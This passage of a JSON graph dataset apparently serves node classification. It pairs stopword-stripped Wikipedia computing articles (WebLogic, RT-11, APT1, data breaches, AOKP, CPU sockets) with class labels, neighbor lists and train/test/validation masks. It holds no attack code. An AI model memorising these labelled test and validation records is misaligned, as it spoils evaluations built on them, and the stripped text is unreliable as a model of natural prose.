salcedo created work titled shibboleth tate modern london 2007–2008 piece consisted 548-foot-long crack bisected floor tate lobby space salcedo said work episode west wing titled shibboleth president bartlet discusses meaning word length advisors believe catch phrase cliche bartlet reminds earlier biblical significance later becomes certain group chinese religious asylum seekers indeed christian representative uses word refer faith meeting",
    "neighbors": [
      1432,
      4830,
      3446
    ],
    "mask": "Test"
  },
  {
    "node_id": 1250,
    "label": 8,
    "text": "Oracle_WebLogic_Server:oracle weblogic server oracle weblogic server java ee application server currently developed oracle corporation oracle acquired weblogic server purchased bea systems 2008 oracle weblogic server forms part oracle fusion middleware portfolio supports oracle db2 microsoft sql server mysql enterprise jdbc-compliant databases oracle weblogic platform also includes weblogic server includes .net interoperability supports following native integration capabilities oracle weblogic server process edition also includes business process management data mapping functionality weblogic supports security policies managed security administrators oracle weblogic server security model includes 2010 oracle corporation regards following products core components oracle weblogic server table lists major standards supported weblogic server product version weblogic server 10.3 10.3.4 /ps3 onwards supports java ee 6 libraries",
    "neighbors": [
      1539,
      4107,
      8742,
      44,
      5677,
      10800,
      2106,
      1594,
      6714,
      3133,
      595,
      597,
      2658,
      10340,
      1128,
      11376,
      6775,
      3705,
      11386,
      4222,
      8350,
      8353,
      3746,
      3237,
      8871,
      7338,
      1707,
      9387,
      11439,
      6338,
      6341,
      6860,
      1755,
      2269,
      6366,
      4837,
      6379,
      5872,
      8434,
      10486,
      9988,
      4358,
      7430,
      7443,
      11030,
      10526,
      7457,
      8994,
      7983,
      9010,
      9012,
      10553,
      3920,
      1363,
      1367,
      4960,
      865,
      2404,
      9580,
      7022,
      10611,
      9078,
      1399,
      3966,
      11134,
      1920,
      2948,
      4485,
      8070,
      910,
      1937,
      11682,
      9125,
      1447,
      5031,
      6067,
      6074,
      10683,
      5567,
      9665,
      2501,
      1991,
      10193,
      3545,
      6107,
      3558,
      3560,
      3561,
      3562,
      5612,
      8691,
      502,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 1251,
    "label": 4,
    "text": "Data_breach:data breach data breach intentional unintentional release secure private/confidential information untrusted environment terms phenomenon include unintentional information disclosure data leak information leakage also data spill incidents range concerted attacks black hats associated organized crime political activist national governments careless disposal used computer equipment data storage media unhackable source definition data breach security incident sensitive protected confidential data copied transmitted viewed stolen used individual unauthorized data breaches may involve financial information credit card bank details personal health information phi personally identifiable information pii trade secrets corporations intellectual property data breaches involve overexposed vulnerable unstructured data – files documents sensitive information according nonprofit consumer organization privacy rights clearinghouse total 227,052,199 individual records containing sensitive personal information involved security breaches united states january 2005 may 2008 excluding incidents sensitive data apparently actually exposed many jurisdictions passed data breach notification laws requiring company subject data breach inform customers takes steps remediate possible injuries may include incidents theft loss digital media computer tapes hard drives laptop computers containing media upon information stored unencrypted posting information world wide web computer otherwise accessible internet without proper information security precautions transfer information system completely open appropriately formally accredited security approved level unencrypted e-mail transfer information information systems possibly hostile agency competing corporation foreign nation may exposed intensive decryption techniques iso/iec 27040 defines data breach compromise security leads accidental unlawful destruction loss alteration unauthorized disclosure access protected data transmitted stored otherwise processed notion trusted environment somewhat fluid departure trusted staff member access sensitive information become data breach staff member retains access data termination trust relationship distributed systems also occur breakdown web trust data quality one way reducing risk data breach partly allows owner data rate data according importance give better protection important data incidents publicized media involve private information individuals e.g social security numbers loss corporate information trade secrets sensitive corporate information details contracts government information frequently unreported compelling reason absence potential damage private citizens publicity around event may damaging loss data working inside organization major cause data breaches estimates breaches caused accidental human factor errors range 37 ponemon institute 14 verizon 2013 data breach investigations report external threat category includes hackers cybercriminal organizations state-sponsored actors professional associations asset managers work aggressively professionals educate best risk-reduction practices internal external threats assets software information security prevention may deflect high percentage attempts ultimately motivated attacker likely find way given network one top 10 quotes cisco ceo john chambers two types companies hacked n't know hacked fbi special agent cyber special operations leo taddeo warned bloomberg television notion protect perimeter falling wayside detection critical celebrities found victims inappropriate medical record access breaches albeit individual basis part typically much larger breach given series medical data breaches lack public trust countries requiring safeguards put place protect security confidentiality medical information shared electronically give patients important rights monitor medical records receive notification loss unauthorized acquisition health information united states eu imposed mandatory medical data breach notifications reportable breaches medical information increasingly common united states although incidents pose risk identity theft serious consequences cases lasting damage either breach security remedied information accessed unscrupulous people thief interested hardware stolen data contains nevertheless incidents become publicly known customary offending party attempt mitigate damages providing victim subscription credit reporting agency instance new credit cards instruments case target 2013 breach cost target significant drop profit dove estimated 40 percent 4th quarter year end 2015 target published report claiming total loss 290 million data breach related fees yahoo breach disclosed 2016 may one expensive today may lower price acquisition verizon 1 billion verizon later released renegotiation yahoo agreeing lower final price 4.8 4.48 billion cybercrime cost energy utilities companies average 12.8 million year lost business damaged equipment according dnv gl international certification body classification society based norway data breaches cost healthcare organizations 6.2 billion last two years presumably 2014 2015 according ponemon study health care 25 million people health care stolen resulting identity theft 6 million people out-of-pocket cost victims close 56 billion notoriously difficult obtain information direct indirect value loss resulting data breach common approach assess impact data breaches study market reaction incident proxy economic consequences typically conducted use event studies measure event economic impact constructed using security prices observed relatively short period time several studies studies published varying findings including works kannan rees sridhar 2007 cavusoglu mishra raghunathan 2004 campbell gordon loeb lei 2003 well schatz bashroush 2017 notable incidents include",
    "neighbors": [
      7560,
      2953,
      5002,
      6410,
      6797,
      5007,
      4117,
      10006,
      8471,
      5373,
      5024,
      3495,
      3880,
      297,
      9000,
      10412,
      1069,
      3629,
      9901,
      4016,
      1918,
      6834,
      10110,
      10492,
      823,
      1083,
      11198,
      1087,
      1473,
      9929,
      7887,
      4689,
      11347,
      10708,
      7893,
      9688,
      4830,
      3423,
      5726,
      8288,
      9186,
      101,
      11368,
      2926,
      113,
      3825,
      10867,
      7926,
      503,
      4348,
      4221,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 1252,
    "label": 2,
    "text": "Hikaru_Aizawa:hikaru aizawa hikaru first one microsoft taiwan 2010 tech days campaign plannings software virtual character designed purpose promote technological revision microsoft silverlight prior agent manufacturer windows 7 japan windows 7 mania designed non-official virtual character madobe nanami later approved microsoft used promotion",
    "neighbors": [
      5526,
      11559
    ],
    "mask": "None"
  },
  {
    "node_id": 1253,
    "label": 2,
    "text": "RT-11:rt-11 rt-11 rt real-time discontinued small single-user real-time operating system digital equipment corporation pdp-11 family 16-bit computers rt-11 first implemented 1970 widely used real-time systems process control data acquisition across full line pdp-11 computers rt-11 systems support preemptive multitasking versions could run multiple simultaneous applications variants monitors provided background job fb xm zm monitors also provided foreground job well six system jobs selected via sysgen system generation program tasks fixed priorities background job lowest foreground job highest possible switch jobs system console user interface sysgen could generate monitor provided single background job sb xb zb variants rt-11 written assembly language heavy use conditional assembly macro programming features macro-11 assembler allowed significant degree configurability allowed programmers specify high-level instructions otherwise unprovided machine code rt-11 distributions included source code operating system device drivers comments removed program named sysgen would build operating system drivers according user-specified configuration developer documentation included kernel listing included comments rt-11 device drivers loadable except prior v4.0 device driver system device boot device built kernel configuration time rt-11 commonly used device control data acquisition common developers write enhance device drivers dec encouraged driver development making hardware subsystems bus structure code open documenting internals operating system encouraging third-party hardware software vendors fostering development digital equipment computer users society users generally operated rt-11 via printing terminal video terminal originally via strap-selectable current-loop conventional teletypes rs-232 later rs-422 well interface one cpu cards dec also supported vt11 vs60 graphics display devices vector graphics terminals graphic character generator displaying text light pen graphical input third-party favorite tektronix 4010 family keyboard monitor kmon interpreted commands issued user would invoke various utilities command string interpreter csi forms commands rt-11 command language many features commands device names found later dos line operating systems heavily borrowed rt-11 csi form expected input output filenames options 'switches rt-11 precise order syntax command-line switches separated sign rather used unix-like operating systems commands full form short one could contracted example rename command could contracted ren batch files batch processor could used issue series commands rudimentary control flow batch files extension .bat later releases rt-11 possible invoke series commands using .com command file would executed sequence flow control even later possible execute series commands great control use indirect command file processor ind took .cmd control files input files extension .sav sort executables known save files rt-11 save command could used save contents memory disk file could loaded executed later time allowing session saved save command along get start reenter examine deposit basic commands implemented kmon commands utilities later borrowed dos-line operating systems commands include dir copy rename assign cls delete type help others format command used physical disk formatting although capable creating file system purpose init command used analogue dos command format /q commands supported use wildcards file names physical device names specified form 'dd n 'dd two-character alphabetic device name optional n unit number 0–7 unit number omitted unit 0 assumed example tt referred console terminal lp lp0 referred parallel line printer dx0 dy1 dl4 referred disk volumes rx01 unit 0 rx02 unit 1 rl01 rl02 unit 4 respectively logical device names consisted 1–3 alphanumeric characters used place physical device name accomplished using codice_1 command example one might issue codice_2 would cause future references 'abc map 'dl0 reserved logical name dk referred current default device device included file specification dk assumed reserved logical name sy referred system device device system booted later versions rt-11 allowed specification 64 units 0–77 octal certain devices device name still limited three alphanumeric characters feature enabled sysgen selection applied du ld device handlers two cases device name form became 'dnn 'd 'd du device l ld device 'nn 00–77 octal rt-11 distributed utilities allowed user perform many actions utilities dir dup pip format allowed user manage disk volumes teco edit visual editors ked dec vt100 k52 dec vt52 allowed user create edit source data files macro link libr allowed user build executables odt vdt sd device allowed user debug programs dec version runoff allowed user produce documents finally vtcom allowed user connect use transfer files another computer system phone using modem system complete enough handle many modern personal computing tasks large amounts free user-contributed software rt-11 available digital equipment computer users society decus including implementation c. although tools develop debug assembly-language programs provided languages including c fortran pascal several versions basic available dec layered products extra cost versions programming languages also available third-party sources even possible network rt-11 machines using decnet internet protocols developed third-party sources rt-11 operating system could booted perform useful work machine consisting two 8-inch 250kb floppy disks 56kb memory could support 8 terminals boot options include rk05 2.5mb removable hard disk platter magnetic tape distributions available pre-installed punched tape magnetic tape cartridge tape floppy disk minimal complete system supporting single real-time user could run single floppy disk 8k 16-bit words 16kb ram including user programs facilitated support swapping overlaying realize operation small memory system keyboard command user interface would swapped execution user program swapped memory upon program termination system supported real-time clock printing terminal vt11 vector graphic unit 16 channel 100 khz a/d converter 2 channel d/a 9600 baud serial port 16 bit bidirectional boards etc rt-11 implemented simple fast file system employing six-character filenames three-character extensions 6.3 encoded radix-50 packed nine characters three 16-bit words six bytes files contiguous meaning file occupied consecutive blocks minimally addressable unit disk storage 512 bytes disk meant entire file could read written quickly side effect file system structure files created deleted volume time unused disk blocks would likely remain contiguous could become limiting factor creation large files remedy periodically “ squeeze ” squish disk consolidate unused portions volume one directory preallocated beginning volume directory consists array entries one per file unallocated space directory entry 8 16-bit words though sysgen option allowed extra application-specific storage many rt11 programs need specialized peripherals direct access hardware could directly executed using rt11 rts run-time system rsts/e timesharing system rtem rt emulator various releases rsx-11 vms implementation dcl rt-11 increased compatibility dec operating systems although operating system commands options unique operating system number commands command options common dec also sold rsx-11 multiuser multitasking operating system realtime features rsts/e originally named rsts-11 multiuser time-sharing system rt-11 remained operating system choice data acquisition systems real time response required unix operating system also became popular lacked real-time features extremely small size rt-11 rt-11 ran members dec pdp-11 family q-bus- unibus-based pdp-11/05 first target 1970 final pdp-11 implementations pdp-11/93 /94 addition ran professional series pdt-11 programmed data terminal systems also dec since pdp-11 architecture implemented replacement products companies e.g. m100 family mentec reverse-engineered clones countries e.g. dvk soviet union rt-11 runs machines well fuzzball routing software internet protocols capable running rt-11 programs hammondsoftware distributed number rt-11 compatible operating systems including stareleven early multi-computer system shareplus multi-process/multi-user implementation rt-11 borrowed architectural concepts vax/vms operating system rt-11 device drivers required operation transparent device access pdp-11s vax/vms supported network option limited rsx-11 application compatibility also available shareplus strongest user base europe h computing developed distributed tsx-plus multi-user multi-processing implementation rt-11 thing n't handle boot process tsx-plus machine required boot rt-11 first running tsx-plus user program tsx-plus running would take complete control machine rt-11 provided true memory protection users users provided user accounts maintained account separation disk volumes implemented superset rt-11 emt programmed requests rt-11 programs generally ran unmodified tsx-plus fact rt-11 utilities used as-is tsx-plus device drivers generally required slight modifications users could choose four variants differing levels support multitasking several specialized pdp-11 systems sold based rt-11 several clones rt-11 made ussr",
    "neighbors": [
      2560,
      6155,
      10251,
      6675,
      7187,
      7188,
      10776,
      25,
      8729,
      4637,
      9759,
      9762,
      4643,
      6180,
      7217,
      10803,
      10809,
      6207,
      576,
      2625,
      3650,
      8262,
      6221,
      3160,
      10333,
      97,
      11363,
      5220,
      1126,
      6760,
      10856,
      9835,
      7285,
      4727,
      9335,
      11383,
      634,
      1147,
      3197,
      1150,
      5247,
      2687,
      11390,
      2179,
      6276,
      10883,
      10891,
      6797,
      10382,
      9366,
      7319,
      6296,
      2201,
      9370,
      9882,
      9887,
      8876,
      5293,
      8879,
      178,
      9907,
      6837,
      6329,
      8889,
      7358,
      5823,
      8388,
      1221,
      9927,
      1736,
      2248,
      5328,
      5840,
      1750,
      7382,
      8410,
      9436,
      1247,
      11489,
      7403,
      10475,
      242,
      5363,
      10482,
      9466,
      9468,
      1278,
      6921,
      1804,
      273,
      8977,
      787,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      10030,
      7983,
      6448,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      1853,
      7999,
      321,
      10561,
      11075,
      4423,
      6985,
      5452,
      6988,
      8524,
      7504,
      5457,
      7507,
      341,
      3413,
      7511,
      10590,
      5472,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      3960,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      5531,
      9628,
      11675,
      2462,
      5022,
      7076,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      5043,
      5044,
      10676,
      11187,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9162,
      2507,
      9166,
      477,
      6624,
      5603,
      10730,
      10731,
      8687,
      3056,
      5105,
      6128,
      5619,
      5115,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 1254,
    "label": 4,
    "text": "PLA_Unit_61398:pla unit 61398 pla unit 61398 also known apt 1 comment crew comment panda gif89a byzantine candor pinyin 61398 bùduì military unit cover designator mucd people liberation army advanced persistent threat unit alleged source chinese computer hacking attacks unit stationed pudong shanghai 19 may 2014 us department justice announced federal grand jury returned indictment five 61398 officers charges theft confidential business information intellectual property u.s. commercial firms planting malware computers five huang zhenyu 黄振宇 wen xinyu 文新宇 sun kailiang 孙凯亮 gu chunhui 顾春晖 wang dong 王东 forensic evidence traces base operations 12-story building datong road public mixed-use area pudong shanghai group also known various names including advanced persistent threat 1 apt1 comment group byzantine candor codename given us intelligence agencies since 2002 report computer security firm mandiant stated pla unit 61398 believed operate 2nd bureau people liberation army general staff department gsd third department 总参三部二局 evidence contains entity mandiant calls apt1 part advanced persistent threat attacked broad range corporations government entities around world since least 2006 apt1 described comprising four large networks shanghai two serve pudong new area one 20 apt groups origins china third fourth department responsible electronic warfare believed comprise pla units mainly responsible infiltrating manipulating computer networks group often compromises internal software comment features legitimate web pages infiltrate target computers access sites leading known comment group collective stolen trade secrets confidential information numerous foreign businesses organizations course seven years lockheed martin telvent companies shipping aeronautics arms energy manufacturing engineering electronics financial software sectors dell secureworks says believed group includes group attackers behind operation shady rat extensive computer espionage campaign uncovered 2011 70 organizations five-year period including united nations government agencies united states canada south korea taiwan vietnam targeted attacks documented summer 2011 represent fragment comment group attacks go back least 2002 according incident reports investigators fireeye inc. alone tracked hundreds targets last three years estimates group attacked 1,000 organizations activity malware embedded compromised system malware controllers takes place business hours beijing time zone suggesting group professionally hired rather private hackers inspired patriotic passions 2013 government china consistently denied involved hacking response mandiant corporation report unit 61398 hong lei spokesperson chinese foreign ministry said allegations unprofessional 2013 china changed position openly admitted secretive cyber warfare units military civilian part governmenthowever details activities left speculation show force towards rest global community chinese government openly lists abilities comes digital spying network attack capabilities",
    "neighbors": [
      1024,
      3072,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      10297,
      1608,
      3657,
      8779,
      1113,
      4703,
      8288,
      2147,
      8292,
      3704,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      7887,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      3852,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      4956,
      1886,
      1381,
      8045,
      4462,
      3956,
      6520,
      9082,
      11152,
      10132,
      9630,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      5563,
      9664,
      8133,
      4054,
      7639,
      8664,
      4063,
      1504,
      5087,
      9186,
      2542,
      507,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1255,
    "label": 2,
    "text": "AOKP:aokp aokp short android open kang project open-source replacement distribution smartphones tablet computers based android mobile operating system name play word kang slang stolen code aosp android open source project name joke stuck started free open-source software roman birg based official releases android open source project google added original third-party code features control although portion total aokp users elect report use firmware september 2013 used 3.5 million devices across world aokp allows users change many aspects os including appearance functions allows customizations normally permitted factory firmware aokp builds/releases provided milestone nightly schedule milestones stable builds usually released month however milestone builds released several years aokp team appears release nightlies nougat builds nightlies automatic builds every 3 days latest code committed may contain bugs notified new releases users get aokpush application uses google cloud messaging gcm service provided google immediately receive push notifications build complete ready download aokpush users also get available test builds random messages developer team gcm integrated android framework application wake device periodically fetch data use extra battery also devices would rely aokp get latest android update long introduction htc dream named t-mobile g1 united states mobile phone september 2008 method discovered attain privileged control termed root access within android linux-based subsystem root access combined open source nature android operating system allowed phone stock firmware modified re-installed onto phone following years several modified firmware releases mobile devices developed distributed android enthusiasts one maintained developer named roman birg aokp quickly became popular among several high-end android mobile owners aokp started november 2011 quickly grew popularity forming small community developers called aokp team also known team kang within months number devices features supported aokp escalated aokp quickly became second popular android firmware distributions cyanogenmod first aokp developed using distributed revision control system official repositories hosted github like many open source projects new features bug fix changes made contributors submitted using google source code review system gerrit contributions may tested anyone voted registered users ultimately accepted code aokp developers 2011 2012 2013 2014 2014 2015 2016 2017",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      10303,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      7857,
      196,
      8907,
      8413,
      9949,
      8940,
      9964,
      5363,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      823,
      5431,
      2875,
      3900,
      7483,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      5067,
      2001,
      11221,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 1256,
    "label": 3,
    "text": "Robustness_principle:robustness principle computing robustness principle design guideline software principle also known postel law jon postel wrote early specification tcp words programs send messages machines programs machine conform completely specifications programs receive messages accept non-conformant input long meaning clear among programmers produce compatible functions principle popularized form contravariant input type covariant output type rfc 1122 1989 expanded postel principle recommending programmers assume network filled malevolent entities send packets designed worst possible effect protocols allow addition new codes existing fields future versions protocols accepting messages unknown codes possibly logging programmers avoid sending messages legal obscure protocol features might expose deficiencies receivers design code survive misbehaving hosts also cooperate limit amount disruption hosts cause shared communication facility 2001 marshall rose characterized several deployment problems applying postel principle design new application protocol example defective implementation sends non-conforming messages might used implementations tolerate deviations specification possibly several years later connected less tolerant application rejects messages situation identifying problem often difficult deploying solution costly rose therefore recommended explicit consistency checks protocol ... even impose implementation overhead 2015 2018 series internet-drafts martin thomson argues postel robustness principle actually leads lack robustness including security 2018 paper privacy-enhancing technologies florentin rochet olivier pereira showed exploit postel robustness principle inside tor routing protocol compromise anonymity onion services tor clients unix philosophy",
    "neighbors": [
      9507,
      5546,
      10924,
      367,
      1368,
      5531
    ],
    "mask": "Test"
  },
  {
    "node_id": 1257,
    "label": 9,
    "text": "ZeroBrane_Studio:zerobrane studio zerobrane studio lightweight open-source lua ide code completion syntax highlighting code analyzer live coding debugging support lua 5.1 lua 5.2 lua 5.3 luajit lua engines zerobrane studio cross-platform application written lua runs windows windows xp+ linux macos 10.7+ operating systems uses wxwidgets toolkit scintilla component file editing zerobrane studio created paul kulchenko september 2011 way allow inexperienced users run debug lua applications initially targeting lua applications running mobile devices based open-source estrela editor luxinia open-source 3d graphics engine estrela editor developed starting august 2008 based one sample applications included wxlua wrapper around wxwidgets first public version zerobrane studio released january 2012 first year project development estrela zerobrane studio continued parallel october 2012 estrela editor project fully merged zerobrane studio project zerobrane studio provides integration debugging support lua 5.1 lua 5.2 lua 5.3 luajit interpreters integrated various products coronasdk cocos2d moai sdk löve gideros mobile redis torch adobe lightroom nginx lua scripts several books tutorials cover using zerobrane studio various game mobile toolkits also used teaching undergraduate graduate class mobile application development zerobrane studio provides local remote cross-platform debugging applications executing lua code debugger supports following functions step code set/remove breakpoints inspect variables expressions using watch window inspect call stack local values upvalues local values defined outer scope current function using stack window suspend/resume running application run lua commands console window ide also supports on-device debugging corona sdk gideros mobile software development kits application running mobile device ide running desktop computer addition debugging lua applications zerobrane studio also supports live coding allows making changes application code application running seeing results changes application live coding supported lua interpreters several environments zerobrane studio includes support plugins written lua open source plugin repository currently lists 45 plugins range simple plugins customize environment complex ones provide real-time watches document map split screen editing packaged versions zerobrane studio distributed project website include educational materials lua 50 simple scripts examples demonstrating use lua turtle graphics spirograph scripts zerobrane studio supports markdown formatting comments supports text formatting references lua files external resources supports execution lua commands directly ide providing integration included educational materials zerobrane studio supports interface translation different languages providing lua file containing text translated 2014 user community contributed translations six languages",
    "neighbors": [
      3237,
      4777,
      5612,
      7983,
      7347,
      823,
      4186
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1258,
    "label": 8,
    "text": "Thymeleaf:thymeleaf thymeleaf java xml/xhtml/html5 template engine work web servlet-based non-web environments better suited serving xhtml/html5 view layer mvc-based web applications process xml file even offline environments provides full spring framework integration web applications thymeleaf aims complete substitute javaserver pages jsp implements concept natural templates template files directly opened browsers still display correctly web pages thymeleaf open-source software licensed apache license 2.0 project website following example produces html5 table rows item list product variable called products piece code includes also fragment x html code perfectly displayed browser prototype without processed natural template",
    "neighbors": [
      11307,
      5612,
      5677,
      7983,
      9590,
      11354,
      8860,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 1259,
    "label": 7,
    "text": "Marc_Benioff:marc benioff marc russell benioff born september 25 1964 american internet entrepreneur author philanthropist net worth 6.4 billion founder chairman co-ceo salesforce enterprise cloud computing company august 2019 owned 4,14 salesforce shares worth 4,33 billion benioff raised jewish family long established san francisco bay area graduated burlingame high school 1982 benioff received bachelor science business administration university southern california 1986 member tau kappa epsilon fraternity marc distant cousin showrunner television producer david benioff married lynne benioff two children family lives san francisco california still high school benioff sold first application juggle 75 15 years old founded liberty software creating selling games flapper atari 8-bit epyx published king arthur heir nightmare escape vulcan isle crypt undead 16 benioff earning royalties 1,500 month enough pay college usc benioff internships assembly language programmer macintosh division apple computer expected continue programming college usc professors advised benioff obtain customer-oriented work experience joined oracle corporation graduation customer-service role prior founding salesforce benioff oracle 13 years variety executive positions sales marketing product development 23 named oracle rookie year three years later promoted vice president company youngest person hold title benioff founded salesforce march 1999 rented san francisco apartment defined mission marketing statement end software long evangelized software service model would replace traditional enterprise software creator term platform service extended salesforce reach allowing customers build applications company architecture salesforce cloud september 16 2018 marc wife lynne bought time 190m 2009 members world economic forum named one young global leaders 2016 named one fortune 50 world greatest leaders commitment equality social issues ceo also named businessperson year fortune readers one best ceos world barron received economist innovation award served co-chairman president information technology advisory committee 2003–2005 benioff also member world economic forum board trustees salesforce named one world innovative companies five years row forbes magazine fortune magazine named salesforce world admired company software industry four years row named company best place work eight years row benioff received honorary degree doctor humane letters university southern california may 16 2014 march 17 2017 benioff included business leaders symposium organized trump administration german chancellor angela merkel visit white house benioff chairman salesforce.com foundation established 2000 public charity created 1-1-1 model integrated corporate philanthropy companies contribute 1 percent equity 1 percent employee hours 1 percent product back communities serves parts 1-1-1 model adopted 700 companies including google 2007 committee encouraging corporate philanthropy presented benioff excellence corporate philanthropy award 2008 invited become director board march 2016 salesforce.com delivered 115 million grants 1.3 million employee volunteer hours used 28,000 non-profit organisations salesforce technology 700 companies adopted 1-1-1 model pledge 1 movement 2018 salesforce.com united way created salesforce.org philanthropy cloud global platform connects employees customers partners charities gives ability streamline philanthropic investments real-time reporting benioff credits mata amritanandamayi inspiring philanthropic business models stating pivotal meeting mata amritanandamayi ... introduced idea possibility giving back world pursuing career ambitions realized n't make choice business good could align two values strive succeed simultaneously marc benioff wife lynne recognized top philanthropists forbes america 50 top giver list 2015 chronicle philanthropy philanthropy 50 list 2010 2014 2015 june 2010 announced 100-million gift ucsf children hospital goal seeing new hospital built significantly advancing children healthcare worldwide 2014 marc lynne benioff donated another 100 million ucsf oakland children hospital called benioff children hospitals marc lynne benioff also donated ocean cleanup non-profit organization developing technologies rid world oceans plastic benioff said businesses greatest platforms change world follows world economic forum founder klaus schwab multistakeholder approach leadership says leaders serve shareholders stakeholders including customers employees partners communities environment make world better place march 2015 benioff announced salesforce would cancel employee programs travel state indiana passing sb 101 religious freedom restoration act controversial bill would allow companies individuals deny service lgbt individuals based religious beliefs largest tech employer indiana following 2013 acquisition exacttarget benioff led global effort business leaders fighting back legislation ultimately leading indiana state legislature passing amendment bill containing protections lgbt customers tenants employees benioff led similar movement february 2016 georgia hb 757 first amendment defense act announced salesforce would reduce investments georgia cancel annual conference bill passed as-is month later governor vetoed bill april 2015 benioff announced would reviewing salaries salesforce ensure men women paid equally comparable work heels salary assessment benioff joined president barack obama january 2016 celebrated anniversary lily ledbetter fair pay act renewed call congress pass paycheck fairness act march 2018 benioff announced would donating 1 million march lives announcement benioff wrote motivated join many passionate safety kids 'll give 1 million march lives together us make children health safety number one priority join us march march 24th october 2018 interview guardian benioff criticized technology industry executives hoarding money refusing help homeless people san francisco bay area reference pending bill would increase gross receipts tax 0.5 benioff stated “ critical moment think prop c kind illuminates willing san franciscan actually support local services. ” benioff supported hillary clinton president united states 2016 presidential election included zdnet 2017 list 21 ceos 'd like see run president",
    "neighbors": [
      4194,
      1764,
      10090,
      2768,
      5553,
      467,
      1755,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 1260,
    "label": 3,
    "text": "CPU_socket:cpu socket computer hardware cpu socket cpu slot contains one mechanical components providing mechanical electrical connections microprocessor printed circuit board pcb allows placing replacing central processing unit cpu without soldering common sockets retention clips apply constant force must overcome device inserted chips large number pins zero insertion force zif sockets preferred common sockets include pin grid array pga land grid array lga designs apply compression force either handle pga type surface plate lga type put place provides superior mechanical retention avoiding risk bending pins inserting chip socket certain devices use ball grid array bga sockets although require soldering generally considered user replaceable cpu sockets used motherboard desktop server computers allow easy swapping components also used prototyping new circuits laptops typically use surface-mount cpus take less space motherboard socketed part cpu socket made plastic often comes lever latch metal contacts pins lands cpu many packages keyed ensure proper insertion cpu cpus pga pin grid array package inserted socket included latch closed cpus lga land grid array package inserted socket latch plate flipped position atop cpu lever lowered locked place pressing cpu contacts firmly socket lands ensuring good connection well increased mechanical stability table legend slotkets special adapters using socket processors bus-compatible slot motherboards",
    "neighbors": [
      3586,
      3588,
      6151,
      10260,
      6175,
      7712,
      7714,
      2604,
      6192,
      2623,
      7744,
      11331,
      3142,
      7247,
      4179,
      4185,
      613,
      7788,
      4717,
      1651,
      4217,
      3194,
      1677,
      4246,
      8855,
      11417,
      4252,
      4767,
      8353,
      9400,
      6329,
      2237,
      6339,
      4805,
      3783,
      8394,
      2764,
      9427,
      3798,
      9945,
      11484,
      2269,
      5859,
      10468,
      1776,
      8442,
      5883,
      9475,
      8452,
      4872,
      5384,
      5901,
      4886,
      7963,
      10019,
      1322,
      3883,
      2350,
      1329,
      3892,
      2874,
      5444,
      3403,
      4427,
      9551,
      7002,
      11613,
      9570,
      4451,
      8552,
      371,
      9592,
      2944,
      9092,
      3973,
      9095,
      3464,
      7058,
      5523,
      2455,
      3992,
      4505,
      3995,
      2463,
      9122,
      5541,
      4523,
      11183,
      9649,
      10675,
      8629,
      4537,
      7105,
      9157,
      7110,
      7122,
      473,
      10715,
      7132,
      2525,
      1000,
      1005,
      7151,
      10225
    ],
    "mask": "Test"
  },
  {
    "node_id": 1261,
    "label": 5,
    "text": "TFI-5:tfi-5 tfi-5 standardized tdm fabric framer interface oif allow framer switch components multiple vendors inter-operate facilitating development add/drop multiplexers tdm cross connect grooming switches standard includes link integrity monitoring connection management mapping mechanisms sonet/sdh non-sonet/sdh clients ethernet fibre channel main application tfi-5 time-division multiplexing tdm contrast ofi standards spi-5 target packet/cell applications ofi level 5 standards covered interfaces 40 gbit/s",
    "neighbors": [
      3168,
      1281
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1262,
    "label": 7,
    "text": "Open_Data_Center_Alliance:open data center alliance opendatacenteralliance.org appears closed open data center alliance independent organization created oct. 2010 assistance intel coordinate development standards cloud computing approximately 100 companies account 50bn spending joined alliance including bmw royal dutch shell marriott hotels alliance cloud 2015 vision aimed creating federated cloud common standards laid hardware software arena organization sees growing need solutions developed open industry-standard multi-vendor fashion thus created usage model roadmap featuring 19 prioritized usage models usage models provide detailed requirements data center cloud solutions include detailed technical documentation discussing requirements technology deployments roadmap development steering committee established five initial technical workgroups areas infrastructure management regulation ecosystem security services organization delivered 0.50 usage model roadmap open data center alliance technical workgroups oct. 2010 delivered full 1.0 roadmap public use june 2011 steering committee consists bmw capgemini china life china unicom group deutsche bank jpmorgan chase lockheed martin marriott international inc. national australia bank royal dutch shell terremark ubs members include cern ebay logica motorola mobility inc. nokia demands organisations coming alarming rate many many different solutions developed today maybe n't work need one voice one road map companies able say manufacturers clear vision developing product says marvin wheeler terremark chairman alliance unclear successful alliance least shedding spotlight cloud interoperability big emerging issue said larry dignan zdnet",
    "neighbors": [
      4194,
      3502
    ],
    "mask": "Test"
  },
